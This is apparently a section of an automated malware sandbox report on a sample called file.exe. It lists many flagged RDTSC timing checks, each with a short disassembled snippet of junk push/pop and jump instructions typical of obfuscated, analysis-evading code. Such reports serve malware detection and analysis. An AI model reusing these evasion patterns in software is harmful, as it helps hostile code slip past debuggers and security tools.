            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4239 second address: 2A4253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE9F8B69B9Eh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4957 second address: 2A4972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jns 00007FE9F881B0BEh 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007FE9F881B0B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4972 second address: 2A4981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jne 00007FE9F8B69B96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4981 second address: 2A498D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE9F881B0B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4D79 second address: 2A4D88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE9F8B69B96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4D88 second address: 2A4DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4DAB second address: 2A4DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4DAF second address: 2A4DC0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9F881B0B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4F1F second address: 2A4F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F8B69BA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4F36 second address: 2A4F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C8h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5661 second address: 2A567C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE9F8B69BA3h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A567C second address: 2A5690 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9F881B0B8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FE9F881B0B6h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5690 second address: 2A5694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3C37 second address: 2A3C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC400 second address: 2AC404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC404 second address: 2AC430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9F881B0BAh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC430 second address: 2AC467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9F8B69B9Ch 0x00000008 push edx 0x00000009 pop edx 0x0000000a jl 00007FE9F8B69B96h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FE9F8B69BA4h 0x00000017 pushad 0x00000018 popad 0x00000019 jne 00007FE9F8B69B96h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6F1B second address: 2B6F2B instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9F881B0B6h 0x00000008 jne 00007FE9F881B0B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6F2B second address: 2B6F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6F32 second address: 2B6F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B8658 second address: 2B866D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE9F8B69B96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FE9F8B69B98h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B866D second address: 2B8692 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9F881B0CDh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FE9F881B0C5h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BC237 second address: 2BC255 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9F8B69B96h 0x00000008 jmp 00007FE9F8B69BA4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BC255 second address: 2BC270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE9F881B0C5h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BC270 second address: 2BC27A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE9F8B69B96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C30FA second address: 2C3121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FE9F881B0CFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C328B second address: 2C3291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C7F38 second address: 2C7F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB66 second address: 1ECB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB6C second address: 1ECB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9F881B0B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB79 second address: 1ECB9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA0h 0x00000007 jo 00007FE9F8B69B98h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007FE9F8B69BA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1ECB9F second address: 1ECBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D96A1 second address: 2D96AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D96AC second address: 2D96B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D96B0 second address: 2D96B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D96B6 second address: 2D96C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F881B0BCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D96C8 second address: 2D96CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D96CC second address: 2D971A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE9F881B0C1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FE9F881B0C2h 0x00000016 jmp 00007FE9F881B0C3h 0x0000001b pop ebx 0x0000001c jmp 00007FE9F881B0BCh 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D99CB second address: 2D99D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE9F8B69B96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9B01 second address: 2D9B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9C68 second address: 2D9C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9C6E second address: 2D9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9DBF second address: 2D9DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F8B69BA7h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FE9F8B69B9Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D9F2F second address: 2D9F60 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9F881B0BAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FE9F881B0C2h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a jnp 00007FE9F881B0BEh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DA0C1 second address: 2DA0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9F8B69B9Bh 0x00000008 jmp 00007FE9F8B69BA8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DD0D5 second address: 2DD0F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BBh 0x00000007 jmp 00007FE9F881B0BBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007FE9F881B0C2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DEE31 second address: 2DEE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F8B69BA8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E07F3 second address: 2E07F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E07F7 second address: 2E07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F054F second address: 2F0553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F0553 second address: 2F0559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F0559 second address: 2F055F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F055F second address: 2F0580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F0580 second address: 2F0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316360 second address: 316375 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9F8B69B96h 0x00000008 jl 00007FE9F8B69B96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316935 second address: 316939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316939 second address: 316947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FE9F8B69B96h 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316947 second address: 31695F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FE9F881B0BCh 0x00000012 jnl 00007FE9F881B0B6h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31695F second address: 316979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA0h 0x00000007 jp 00007FE9F8B69B9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316C31 second address: 316C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316C37 second address: 316C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE9F8B69BA7h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316C53 second address: 316C73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9F881B0CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316C73 second address: 316C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F50 second address: 316F6F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE9F881B0C9h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F6F second address: 316F94 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9F8B69BAFh 0x00000008 jmp 00007FE9F8B69BA9h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F94 second address: 316F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316F98 second address: 316FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FE9F8B69B9Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FE9F8B69BA9h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316FCB second address: 316FDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31895A second address: 318964 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE9F8B69B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 319FED second address: 319FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B67A second address: 31B67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31B67E second address: 31B687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E2A0 second address: 31E2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31E2A4 second address: 31E30A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9F881B0B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FE9F881B0B8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push esi 0x00000029 xor dh, FFFFFFA5h 0x0000002c pop edx 0x0000002d push 00000004h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FE9F881B0B8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov edx, dword ptr [ebp+122D3DB7h] 0x0000004f push 8BFCE774h 0x00000054 pushad 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 321926 second address: 321942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F8B69BA4h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 321942 second address: 321946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 321946 second address: 32198D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FE9F8B69B96h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FE9F8B69BA0h 0x00000018 pop edx 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c jnp 00007FE9F8B69B96h 0x00000022 jc 00007FE9F8B69B96h 0x00000028 push edi 0x00000029 pop edi 0x0000002a popad 0x0000002b jmp 00007FE9F8B69B9Dh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32198D second address: 3219AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C9h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 234914 second address: 234922 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FE9F8B69B96h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 234922 second address: 234926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A03DF second address: 49A0498 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9F8B69BA0h 0x00000008 xor si, 5078h 0x0000000d jmp 00007FE9F8B69B9Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE9F8B69BA4h 0x0000001e xor cl, FFFFFFD8h 0x00000021 jmp 00007FE9F8B69B9Bh 0x00000026 popfd 0x00000027 mov cx, FD8Fh 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FE9F8B69BA0h 0x00000035 adc ecx, 7F0F3538h 0x0000003b jmp 00007FE9F8B69B9Bh 0x00000040 popfd 0x00000041 movzx esi, di 0x00000044 popad 0x00000045 mov edx, dword ptr [ebp+0Ch] 0x00000048 pushad 0x00000049 push edx 0x0000004a mov eax, 37DAE903h 0x0000004f pop esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushfd 0x00000053 jmp 00007FE9F8B69B9Fh 0x00000058 sbb esi, 76473FAEh 0x0000005e jmp 00007FE9F8B69BA9h 0x00000063 popfd 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0498 second address: 49A04BF instructions: 0x00000000 rdtsc 0x00000002 mov ax, 6437h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9F881B0C9h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A04F7 second address: 49A0507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5894h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0507 second address: 49A0511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 5EE60EC4h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06FE second address: 49C070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F8B69B9Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C070E second address: 49C071C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C071C second address: 49C0761 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007FE9F8B69B9Bh 0x0000000c jmp 00007FE9F8B69BA8h 0x00000011 pop ecx 0x00000012 popad 0x00000013 lea eax, dword ptr [ebp-04h] 0x00000016 jmp 00007FE9F8B69BA1h 0x0000001b nop 0x0000001c pushad 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
